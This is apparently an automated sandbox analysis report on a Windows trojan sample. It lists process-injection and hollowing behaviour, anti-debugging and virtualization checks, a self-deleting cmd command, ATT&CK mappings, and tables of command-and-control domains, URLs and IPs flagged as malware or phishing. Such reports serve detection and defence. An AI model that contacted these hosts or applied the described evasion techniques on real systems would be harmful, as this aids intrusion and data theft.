          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A258C mov eax, dword ptr fs:[00000030h]2_2_017A258C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017D3460 mov eax, dword ptr fs:[00000030h]2_2_017D3460
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe - Process queried: DebugPort
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_0040ACE0 LdrLoadDll, 2_2_0040ACE0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe - Network Connect: 34.120.175.65 80
          Source: C:\Windows\explorer.exe - Network Connect: 91.195.240.123 80
          Source: C:\Windows\explorer.exe - Network Connect: 104.21.48.68 80
          Source: C:\Windows\explorer.exe - Network Connect: 66.235.200.145 80
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 7E0000
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Memory written: C:\Users\user\Desktop\2FcJgghyXg.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Thread register set: target process: 4884
          Source: C:\Windows\SysWOW64\msdt.exe - Thread register set: target process: 4884
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Process created: C:\Users\user\Desktop\2FcJgghyXg.exe C:\Users\user\Desktop\2FcJgghyXg.exe
          Source: C:\Windows\SysWOW64\msdt.exe - Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\2FcJgghyXg.exe"
          Source: explorer.exe, 00000003.00000000.1259038060.0000000001050000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2499808023.0000000001051000.00000002.00000001.00040000.00000000.sdmp - Binary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.1272310868.000000000BA01000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2502277789.00000000043A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1259038060.0000000001050000.00000002.00000001.00040000.00000000.sdmp - Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.1259038060.0000000001050000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2499028894.0000000000BC0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1258733334.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.1259038060.0000000001050000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2499808023.0000000001051000.00000002.00000001.00040000.00000000.sdmp - Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Queries volume information: C:\Users\user\Desktop\2FcJgghyXg.exe VolumeInformation
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match - File source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match - File source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match - File source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match - File source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match - File source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match - File source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match - File source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match - File source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match - File source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match - File source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match - File source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match - File source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match - File source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match - File source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match - File source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match - File source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          MITRE ATT&CK Matrix (the number in parentheses is the count of matching signatures for that technique; techniques without a number had no match)

          Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
          Execution: Shared Modules (1), Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell
          Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
          Privilege Escalation: Process Injection (612), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
          Defense Evasion: Rootkit (1), Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), Process Injection (612), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), Software Packing (2), Timestomp (1)
          Credential Access: Credential API Hooking (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
          Discovery: Security Software Discovery (121), Process Discovery (2), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), System Information Discovery (112), System Owner/User Discovery, Network Sniffing, Network Service Scanning, System Network Connections Discovery
          Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools
          Collection: Credential API Hooking (1), Archive Collected Data (11), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
          Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
          Command and Control: Encrypted Channel (12), Ingress Tool Transfer (4), Non-Application Layer Protocol (3), Application Layer Protocol (14), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
          Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
          Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
          Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 1304954
Sample: 2FcJgghyXg.exe
Startdate: 07/09/2023
Architecture: WINDOWS
Score: 100

Start
  DNS/IP: www.soccercitycupsc.com; www.nazadypro.shop; 3 other IPs or domains
  Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
  • 2FcJgghyXg.exe 3 (started)
    Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
    • 2FcJgghyXg.exe (started)
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      • explorer.exe 2 1 (injected)
        DNS/IP: www.emdefencetech.com 91.195.240.123, 49771, 80 SEDO-ASDE Germany; www.nazadypro.shop 104.21.48.68, 49772, 80 CLOUDFLARENETUS United States; 4 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        • msdt.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe 1 (started)
            • conhost.exe (started)

Source | Detection | Scanner | Label | Link
2FcJgghyXg.exe | 39% | ReversingLabs | Win32.Trojan.Generic | 
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label | Link
http://schemas.mi | 0% | URL Reputation | safe | 
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe | 
http://schemas.micro | 0% | URL Reputation | safe | 
http://schemas.microsoft.co | 0% | URL Reputation | safe | 
http://schemas.micr | 0% | URL Reputation | safe | 
http://www.emdefencetech.com | 0% | Avira URL Cloud | safe | 
http://www.hot-tubs-59198.bond/us94/www.simarnit.com | 100% | Avira URL Cloud | malware | 
http://www.l1z3x.cfd/us94/www.abithashop.com | 0% | Avira URL Cloud | safe | 
http://www.b-cr5.ink | 0% | Avira URL Cloud | safe | 
http://www.l1z3x.cfd | 0% | Avira URL Cloud | safe | 
http://www.soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL | 0% | Avira URL Cloud | safe | 
http://www.hanabi104.online | 0% | Avira URL Cloud | safe | 
http://www.b-cr5.inkReferer: | 0% | Avira URL Cloud | safe | 
http://www.abithashop.com | 0% | Avira URL Cloud | safe | 
http://www.abithashop.comReferer: | 0% | Avira URL Cloud | safe | 
http://www.69v39.top/us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKL | 100% | Avira URL Cloud | phishing | 
http://www.truijkl.xyz/us94/www.j5tm84qrs.top | 100% | Avira URL Cloud | phishing | 
http://www.hot-tubs-59198.bond | 0% | Avira URL Cloud | safe | 
http://www.l1z3x.cfd/us94/ | 0% | Avira URL Cloud | safe | 
http://www.j5tm84qrs.top | 0% | Avira URL Cloud | safe | 
http://www.69v39.top/us94/ | 100% | Avira URL Cloud | phishing | 
http://www.soccercitycupsc.comReferer: | 0% | Avira URL Cloud | safe | 
http://www.nazadypro.shop/us94/ | 100% | Avira URL Cloud | malware | 
http://www.emdefencetech.comReferer: | 0% | Avira URL Cloud | safe | 
http://www.nazadypro.shop/us94/www.soccercitycupsc.com | 100% | Avira URL Cloud | malware | 
http://www.b-cr5.ink/us94/ | 100% | Avira URL Cloud | malware | 
https://powerpoint.office.comcember | 0% | Avira URL Cloud | safe | 
http://www.truijkl.xyz | 0% | Avira URL Cloud | safe | 
http://www.j5tm84qrs.top/us94/www.66xecqk.top | 100% | Avira URL Cloud | phishing | 
http://www.66xecqk.topReferer: | 0% | Avira URL Cloud | safe | 
http://www.69v39.top/us94/www.l1z3x.cfd | 100% | Avira URL Cloud | phishing | 
http://www.soccercitycupsc.com/us94/www.69v39.top | 0% | Avira URL Cloud | safe | 
http://www.soccercitycupsc.com/us94/ | 0% | Avira URL Cloud | safe | 
http://www.66xecqk.top/us94/www.terminalcomputer.info | 100% | Avira URL Cloud | phishing | 
http://www.j5tm84qrs.top/us94/ | 100% | Avira URL Cloud | phishing | 
http://www.abithashop.com/us94/ | 100% | Avira URL Cloud | malware | 
http://www.hanabi104.onlineReferer: | 0% | Avira URL Cloud | safe | 
http://www.ontheroadfromdamascus.com/us94/ | 100% | Avira URL Cloud | malware | 
http://www.hot-tubs-59198.bond/us94/ | 100% | Avira URL Cloud | malware | 
http://www.j5tm84qrs.topReferer: | 0% | Avira URL Cloud | safe | 
http://www.66xecqk.top | 0% | Avira URL Cloud | safe | 
http://www.terminalcomputer.info | 0% | Avira URL Cloud | safe | 
www.l1z3x.cfd/us94/ | 0% | Avira URL Cloud | safe | 
http://www.nazadypro.shopReferer: | 0% | Avira URL Cloud | safe | 
http://www.truijkl.xyzReferer: | 0% | Avira URL Cloud | safe | 
http://www.simarnit.com/us94/www.hanabi104.online | 100% | Avira URL Cloud | malware | 
http://www.ontheroadfromdamascus.com | 0% | Avira URL Cloud | safe | 
http://www.hot-tubs-59198.bondReferer: | 0% | Avira URL Cloud | safe | 
http://www.simarnit.com/us94/ | 100% | Avira URL Cloud | malware | 
http://www.simarnit.com | 0% | Avira URL Cloud | safe | 
http://www.emdefencetech.com/us94/ | 100% | Avira URL Cloud | malware | 
http://www.emdefencetech.com/us94/www.nazadypro.shop | 100% | Avira URL Cloud | malware | 
http://www.69v39.topReferer: | 0% | Avira URL Cloud | safe | 
http://www.soccercitycupsc.com | 0% | Avira URL Cloud | safe | 
http://www.terminalcomputer.info/us94/www.b-cr5.ink | 100% | Avira URL Cloud | malware | 
http://www.69v39.top | 0% | Avira URL Cloud | safe | 
http://www.abithashop.com/us94/www.truijkl.xyz | 100% | Avira URL Cloud | malware | 
http://www.emdefencetech.com/us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKL | 100% | Avira URL Cloud | malware | 
http://www.truijkl.xyz/us94/ | 100% | Avira URL Cloud | phishing | 
http://www.ontheroadfromdamascus.com/us94/www.hot-tubs-59198.bond | 100% | Avira URL Cloud | malware | 
http://www.simarnit.comReferer: | 0% | Avira URL Cloud | safe | 
http://www.l1z3x.cfdReferer: | 0% | Avira URL Cloud | safe | 
http://www.terminalcomputer.infoReferer: | 0% | Avira URL Cloud | safe | 
http://www.terminalcomputer.info/us94/ | 100% | Avira URL Cloud | malware | 
http://www.ontheroadfromdamascus.comReferer: | 0% | Avira URL Cloud | safe | 
http://www.hanabi104.online/us94/ | 100% | Avira URL Cloud | malware | 
http://www.66xecqk.top/us94/ | 100% | Avira URL Cloud | phishing | 
http://www.nazadypro.shop | 0% | Avira URL Cloud | safe | 
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.emdefencetech.com | 91.195.240.123 | true | true | | unknown
www.nazadypro.shop | 104.21.48.68 | true | true | | unknown
soccercitycupsc.com | 66.235.200.145 | true | true | | unknown
www.69v39.top | 34.120.175.65 | true | false | | unknown
www.soccercitycupsc.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL | true | Avira URL Cloud: safe | unknown
http://www.69v39.top/us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKL | false | Avira URL Cloud: phishing | unknown
www.l1z3x.cfd/us94/ | true | Avira URL Cloud: safe | low
http://www.emdefencetech.com/us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKL | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.b-cr5.inkReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.l1z3x.cfd/us94/www.abithashop.com | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.b-cr5.ink/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://schemas.mi | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.emdefencetech.com | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hanabi104.online | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.hot-tubs-59198.bond/us94/www.simarnit.com | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.b-cr5.ink | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://powerpoint.office.comcember | explorer.exe, 00000003.00000000.1272310868.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BB08000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.abithashop.com | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.abithashop.comReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | explorer.exe, 00000003.00000000.1267280115.00000000093F5000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.l1z3x.cfd | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.truijkl.xyz/us94/www.j5tm84qrs.top | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://excel.office.com | explorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.micro | explorer.exe, 00000003.00000000.1259489346.0000000002BD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1265595351.0000000007770000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1265570865.0000000007760000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.hot-tubs-59198.bond | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.l1z3x.cfd/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.69v39.top/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://www.soccercitycupsc.comReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.j5tm84qrs.top | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.emdefencetech.comReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nazadypro.shop/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.truijkl.xyz | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.j5tm84qrs.top/us94/www.66xecqk.top | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://www.nazadypro.shop/us94/www.soccercitycupsc.com | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://hm.baidu.com/hm.js? | explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.66xecqk.topReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.69v39.top/us94/www.l1z3x.cfd | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://www.soccercitycupsc.com/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.soccercitycupsc.com/us94/www.69v39.top | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.microsoft.co | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.66xecqk.top/us94/www.terminalcomputer.info | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://www.abithashop.com/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.j5tm84qrs.top/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://www.ontheroadfromdamascus.com/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.hanabi104.onlineReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nazadypro.shopReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.66xecqk.top | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://word.office.com | explorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.terminalcomputer.info | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hot-tubs-59198.bond/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.j5tm84qrs.topReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.truijkl.xyzReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.simarnit.com/us94/www.hanabi104.online | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.emdefencetech.com/us94/www.nazadypro.shop | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.ontheroadfromdamascus.com | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.micr | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://outlook.com | explorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.emdefencetech.com/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.abithashop.com/us94/www.truijkl.xyz | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.hot-tubs-59198.bondReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.terminalcomputer.info/us94/www.b-cr5.ink | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.simarnit.com | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.simarnit.com/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.soccercitycupsc.com | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.69v39.topReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.69v39.top | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.truijkl.xyz/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
